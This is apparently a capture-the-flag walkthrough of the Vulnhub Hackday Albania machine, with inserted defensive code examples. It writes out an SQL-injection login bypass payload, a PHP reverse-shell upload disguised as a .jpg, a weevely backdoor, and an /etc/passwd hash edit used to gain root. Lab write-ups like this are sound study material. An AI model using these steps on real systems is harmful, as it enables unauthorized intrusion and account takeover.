Vulnhub Hackday Albania
Enumeration
As always, we start the game with a general nmap scan.
nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131
Only two ports appear to be open: 22 and 8008, the latter running Apache 2.4.18.
Apache
Let’s investigate the website.
The nmap scan already showed that there is a robots.txt.
When we open the website there is a dialog box saying
-> Ne qofte se jam UNE, e di se ku te shkoj ;)
Google Translate gives us
-> If I am UNE, I know where to go;)
It doesn’t tell us much.
Source code
While looking at the source code, we can notice that there’s a comment near the end of the page saying
O ok, por jo ketu :)
That translates to
Ok ok, but not here :)
Once again we're not getting much.
Let's move on to robots.txt.
Robots.txt
If we go to 192.168.1.149:8008/robots.txt, we see this text
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
If we append one of these paths to the URL, we get an image.
Since there are a lot of lines, we'll write a script to crawl through every directory and download whatever is inside.
By doing a simple curl through all the folders, I found one that had a message instead of an image.
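The crawl described above, as an added example that is not the author's script: it parses the Disallow entries out of a robots.txt and decides what each path serves by the first bytes of the body rather than by the Content-Type header, which is how the one text response among the images stands out. The robots.txt excerpt and the fake fetcher are constructed so it runs offline.

```python
"""Parse robots.txt Disallow entries and sort each path by what it really serves."""
import re
from typing import Callable, Dict, List, Tuple

# Constructed excerpt: three of the 26 paths listed on the page.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /rkfpuzrahngvat/
Disallow: /unisxcudkqjydw/
Disallow: /qjeotyqzgmfuzs/
"""

# Constructed stand-in for HTTP: path -> (Content-Type header, body bytes).
# The last entry deliberately lies in its header to show why we sniff bytes.
FAKE_RESPONSES: Dict[str, Tuple[str, bytes]] = {
    "/rkfpuzrahngvat/": ("image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    "/unisxcudkqjydw/": ("text/html", b"<h1>IS there any /vulnbank/ in there ???</h1>"),
    "/qjeotyqzgmfuzs/": ("text/html", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
}


def fake_fetch(path: str) -> Tuple[str, bytes]:
    """Replace with a real HTTP GET in practice; here it reads the dict above."""
    return FAKE_RESPONSES[path]


# Leading bytes that identify the common image formats.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def parse_disallow(robots_txt: str) -> List[str]:
    """Return every non-empty Disallow path, ignoring '#' comments and case."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"disallow\s*:\s*(\S+)", line, re.IGNORECASE)
        if m:
            paths.append(m.group(1))
    return paths


def sniff_image(body: bytes) -> str:
    """Classify a body by its magic bytes; anything unrecognised is 'not-image'."""
    for magic, kind in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return kind
    return "not-image"


def classify(robots_txt: str, fetch: Callable[[str], Tuple[str, bytes]]) -> Dict[str, str]:
    """Map each Disallow path to the kind of content its body actually is."""
    result = {}
    for path in parse_disallow(robots_txt):
        _declared_type, body = fetch(path)  # header is ignored on purpose
        result[path] = sniff_image(body)
    return result


def non_images(robots_txt: str, fetch: Callable[[str], Tuple[str, bytes]]) -> List[str]:
    """The paths worth reading by hand: those that did not return an image."""
    return [p for p, kind in classify(robots_txt, fetch).items() if kind == "not-image"]


if __name__ == "__main__":
    for path, kind in classify(SAMPLE_ROBOTS, fake_fetch).items():
        print(f"{path}: {kind}")
```

The lesson for the defender is the same one the box teaches: robots.txt is a list of hints for anyone who reads it, not an access control, and a server header is not evidence of what a body contains.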
IS there any /vulnbank/ in there ???
I tried 192.168.1.149:8008/vulnbank/ but it didn't work.
I then tried to append it to the page where I found the message
http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/
We're getting somewhere: we get a directory listing with a client folder that
leads into a "Very secure bank".
SQLi
We have a username and password input box; it looks like we're going to have to SQL inject our way through.
After trying for more than one hour I decided to use Burp Intruder to do the job.
Using Burp Intruder and a list found on this GitHub -> https://github.com/1N3/IntruderPayloads, we found one winning combination out of 240 tries.
' OR 'p'='p' #;
will bypass the login.
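Why that payload works, as an added example that is not the bank's code: the same login written twice against an in-memory SQLite table, once by pasting the input into the SQL text and once with bound parameters. The trailing # in the page's payload is MySQL's line comment and means nothing to SQLite, so the example drops it and puts the tautology in the password field, where nothing after it needs commenting out. The users table is constructed.

```python
"""Login bypass by tautology, next to the parameterized query that is not fooled."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed credentials. A real application stores a password hash, not the password.
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: user input becomes part of the SQL statement itself."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the input is passed as data and can never change the query."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# The page's payload without the MySQL comment marker. Submitted as the password,
# the vulnerable statement becomes
#   ... WHERE username = 'nobody' AND password = '' OR 'p'='p'
# which AND/OR precedence turns into (false) OR (true): every row matches.
TAUTOLOGY = "' OR 'p'='p"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_real_creds": login_vulnerable(conn, "alice", "correct-horse"),
        "vulnerable_tautology": login_vulnerable(conn, "nobody", TAUTOLOGY),
        "parameterized_real_creds": login_parameterized(conn, "alice", "correct-horse"),
        "parameterized_tautology": login_parameterized(conn, "nobody", TAUTOLOGY),
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

Intruder found the combination by brute force; the parameterized version would have returned nothing for all 240 of them, because the quote characters never reach the parser as syntax.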
Account
We're inside the account and there's an upload button.
We're going to try to upload a PHP reverse shell.
After our first try, we can see that the website checks the file's extension.
On the second try we simply rename it to .jpg and it goes through.
I'll set up nc to listen for the incoming connection
nc -lv 1234
We load the page and boom! We got a reverse shell.
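The check the bank should have had, as an added example that is not the application's code: an upload validator that does not stop at the extension. It requires the bytes to match the format the extension claims, rejects bodies carrying a script marker, and stores the file under a server-chosen name. The sample files below are constructed.

```python
"""Upload validation beyond the file extension."""
import os
import secrets
from typing import Tuple

# Extension -> leading bytes the content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Heuristic only: a real image should never contain these.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")
MAX_BYTES = 2 * 1024 * 1024


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every rejection names the check that failed."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not data.startswith(ALLOWED[ext]):
        # This is the check the rename-to-.jpg trick fails: the bytes are PHP, not JPEG.
        return False, "content does not match extension"
    if any(marker in data for marker in SCRIPT_MARKERS):
        # Catches an image with PHP appended after the picture data.
        return False, "embedded script marker"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random server-side name; the client's name never reaches the disk."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed samples.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 32
RENAMED_PHP = b"<?php echo 'hello'; ?>"          # PHP text saved as something.jpg
POLYGLOT = REAL_JPEG + b"<?php echo 'tail'; ?>"   # valid JPEG header, script appended


if __name__ == "__main__":
    for name, body in [("shell.php", RENAMED_PHP), ("shell.jpg", RENAMED_PHP),
                       ("photo.jpg", REAL_JPEG), ("photo.jpg", POLYGLOT)]:
        print(name, validate_upload(name, body))
```

The content checks are defense in depth; the control that actually decides whether a reverse shell comes back is the web server configuration: nothing in the upload directory should ever be handed to the PHP interpreter, whatever its name or contents.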
Privilege Escalation
We’re inside the system, now we need to get to root.
First things first.
uname -a
linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
We're dealing with kernel 4.4.0; could this still be vulnerable to Dirty COW? And ... nope.
Let's see which OS it's running
cat /etc/lsb-re*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
We got something pretty recent.
Enumeration
After spending a couple of hours looking at the services and libraries, I was
still not able to elevate my privileges.
I tried a bunch of exploits that either crashed the machine or just did nothing.
Having only a reverse shell was quite annoying because you couldn't go back to
get a command you typed a while ago.
So after googling a bit I found weevely. What a beautiful tool.
It lets us create a backdoor in PHP and upload it directly to the server.
Weevely
We need to create the backdoor.
weevely generate toor me.php
This will create the backdoor with the password toor.
Once that is done we have to upload it to a folder we can reach from outside.
In our case we need to put the file in the same directory where we uploaded our
jpg in the previous steps.
A quick find on the jpg we uploaded shows that the
directory is /var/www/html/unisxcudkqjydw/vulnbank/client/upload
We can either wget the file directly from the Kali machine by hosting an
HTTP server with python -m SimpleHTTPServer, or use nc, or one of the
multiple other ways available.
Once the backdoor is in place, we go back to our Kali machine and use the following command to establish the connection
weevely http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/client/upload/me.php toor
where me.php is the backdoor and toor is the password.
We now have a shell with many more functions than the basic reverse shell.
Weevely is love
Weevely has a bunch of commands that do the work for us. :help will list them.
In our case one command shows us a way to obtain root.
:audit_filesystem
Looking at the result, we can see that in /etc/ the file passwd is
writable. There's our door.
Weevely is life
In our simple reverse shell we couldn’t use vim correctly. Weevely fixes that.
What we need to do is change the password of the user we want.
In my previous enumeration I noticed that in the home directory of the user
taviso, he had the file sudo_as_admin_successful.
That means that he has sudo rights as admin. So I'll be changing the password
of taviso to whatever I want.
We can replace the second field in passwd with a password, but it has to be in crypt hash form. Perl will generate that hash for us
perl -le 'print crypt("foo", "aa")'
aaKNIEDOaueR6
Where foo is the new password.
We edit the /etc/passwd file
vi /etc/passwd
taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash
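What an auditor would look for to catch exactly this, as an added example that is not part of weevely: a sensitive file writable by group or others (what :audit_filesystem reported), and a passwd entry whose second field holds a hash instead of the x that defers to /etc/shadow (what the edit above leaves behind). The file modes and the passwd excerpt are constructed; the taviso line is the one written on this page.

```python
"""Two checks on /etc/passwd: who can write it, and which accounts carry a password in it."""
import stat
from typing import Callable, Dict, List

SENSITIVE = ["/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/group"]

# Constructed stand-in for os.stat(path).st_mode; swap in os.stat on a real host.
FAKE_MODES: Dict[str, int] = {
    "/etc/passwd": 0o100666,   # -rw-rw-rw-  the finding on this box
    "/etc/shadow": 0o100640,   # -rw-r-----
    "/etc/sudoers": 0o100440,  # -r--r-----
    "/etc/group": 0o100644,    # -rw-r--r--
}


def writable_by_others(mode: int) -> bool:
    """True if the group or world write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_modes(paths: List[str], mode_of: Callable[[str], int]) -> List[str]:
    """Paths from the list that a non-owner could modify."""
    return [p for p in paths if writable_by_others(mode_of(p))]


# Constructed passwd excerpt. Shadowed accounts carry 'x'; locked ones '*' or '!'.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""


def unshadowed_accounts(passwd_text: str) -> List[str]:
    """Accounts whose password field is a hash or empty rather than a shadow/lock marker.

    An empty field is reported too: it means login with no password at all.
    """
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line, not a passwd record
        if fields[1] not in ("x", "*", "!"):
            hits.append(fields[0])
    return hits


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Any account besides root with UID 0: another classic passwd edit to watch for."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


if __name__ == "__main__":
    print("writable by non-owner:", audit_modes(SENSITIVE, FAKE_MODES.__getitem__))
    print("password stored in passwd:", unshadowed_accounts(SAMPLE_PASSWD))
    print("extra uid 0:", extra_uid0_accounts(SAMPLE_PASSWD))
```

On a real host, replace FAKE_MODES.__getitem__ with lambda p: os.stat(p).st_mode and read /etc/passwd from disk; both checks are cheap enough to run from a cron job or a configuration scanner.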
I tried using su to switch user but it was not available. Let’s just try to ssh into the machine directly.
SSH
We can ssh directly as taviso
And we’re in!
Let’s see our sudo rights
sudo -l
Matching Defaults entries for taviso on hackday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
(ALL : ALL) ALL
That's good game.
We have all the rights.
sudo passwd root
su root
Change the root password and switch to root.
GG